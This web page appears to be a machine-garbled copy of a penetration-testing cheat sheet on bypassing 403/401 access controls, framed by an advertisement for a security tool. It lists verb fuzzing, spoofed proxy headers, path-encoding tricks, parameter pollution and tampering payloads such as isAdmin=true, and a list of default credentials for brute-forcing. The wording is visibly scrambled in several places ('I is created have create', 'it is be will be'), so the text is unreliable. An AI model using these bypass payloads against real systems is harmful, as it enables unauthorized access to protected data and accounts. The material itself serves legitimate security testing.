Get a hacker ‘s perspective on your web app , network , and cloud
find and report critical , exploitable vulnerability with real business impact . use our 20 + custom tool to map the attack surface , find security issue that let you escalate privilege , and use automate exploit to collect essential evidence , turn your hard work into persuasive report .
HTTP Verbs / Methods Fuzzing
try usingdifferent verbs to access the file: GET , HEAD , POST , PUT , delete , CONNECT , option , trace , PATCH , INVENTED , HACK
-
check the response header , maybe some information can be give . For example , a 200 response to head with
Content-Length: 55means that the HEAD verb can access the info. But you still need to find a way to exfiltrate that info. -
Using a HTTP header like
X - http - Method - Override is PUT : PUTcan overwrite the verb used. -
Use
traceverb and if you are very lucky maybe in the response you can see also the headers added by intermediate proxies that might be useful.
-
Fuzz HTTP Headers : try using HTTP Proxy Headers , HTTP Authentication Basic and ntlm brute – force ( with a few combination only ) and other technique . To do all of this I is created have create the tool fuzzhttpbypass .
-
X-Originating-IP: 127.0.0.1 -
X-Forwarded-For: 127.0.0.1 -
X - ProxyUser - Ip : 127.0.0.1 -
X-Original-URL: 127.0.0.1 -
True-Client-IP: 127.0.0.1 -
Cluster - Client - IP : 127.0.0.1 -
X - ProxyUser - Ip : 127.0.0.1
If the path is protected you can try to bypass the path protection using these other headers:
-
X-Original-URL: /admin/console -
X-Rewrite-URL: /admin/console
-
-
fuzz special HTTP header look for different response .
-
Fuzz special HTTP headers while fuzzing HTTP Methods.
-
-
Remove the Host header and maybe you will be able to bypass the protection.
Path Fuzzing
If /path is block :
-
try using/%2e/path _(if the access is blocked by a proxy, this could bypass the protection). Try also_** /%252e**/path (double URL encode)
-
Try Unicode bypass: /%ef%bc%8fpath ( The url encode char are like ” / ” ) so when encode back it is be will be//path and maybe you will have already bypassed the /path name check
-
Other path bypasses:
-
site.com/secret –> HTTP 403 Forbidden
-
site.com/SECRET –> HTTP 200 OK
-
site.com/secret/ –> HTTP 200 OK
-
site.com/secret/. –> HTTP 200 OK
-
site.com//secret// –> HTTP 200 OK
-
site.com/./secret/.. –> HTTP 200 OK
-
site.com/;/secret –> HTTP 200 OK
-
site.com/.;/secret –> HTTP 200 OK
-
site.com//;//secret –> HTTP 200 OK
-
site.com/secret.json –> HTTP 200 OK (ruby)
-
use all this list in the follow situation :
-
-
Other API bypasses:
-
/v3/users_data/1234 –> 403 Forbidden
-
/v1/users_data/1234 –> 200 OK
-
{“id”:111} –> 401 Unauthriozied
-
{“id”:111} –> 401 Unauthriozied
-
{“id”:{“id”:111}} –> 200 OK
-
{“user_id”:”<legit_id>”,”user_id”:”<victims_id>”} (JSON Parameter Pollution)
-
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
-
Parameter Manipulation
-
Change param value: From
id=123–>id=124 -
add additional parameter to the URL :
?id=124—->id=124&isAdmin=true -
Perform boundary testing in the parameters — provide values like -234 or 0 or 99999999 (just some example values).
Protocol version
If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.
Other bypass
-
Get the ip or cname of the domain and try contact it directly .
-
Change the protocol: from http to https, or for https to http
Brute Force
-
guess the password : test the follow common credential . Do you is know know something about the victim ? Or the CTF challenge name ?
admin admin
admin password
admin 1234
admin admin1234
admin 123456
root toor
test test
guest guestAutomatic Tools
Get a hacker ‘s perspective on your web app , network , and cloud
find and report critical , exploitable vulnerability with real business impact . use our 20 + custom tool to map the attack surface , find security issue that let you escalate privilege , and use automate exploit to collect essential evidence , turn your hard work into persuasive report .
© Copyright notes
The copyright of the article belongs to the author, please do not reprint without permission.
Related posts
No comments...
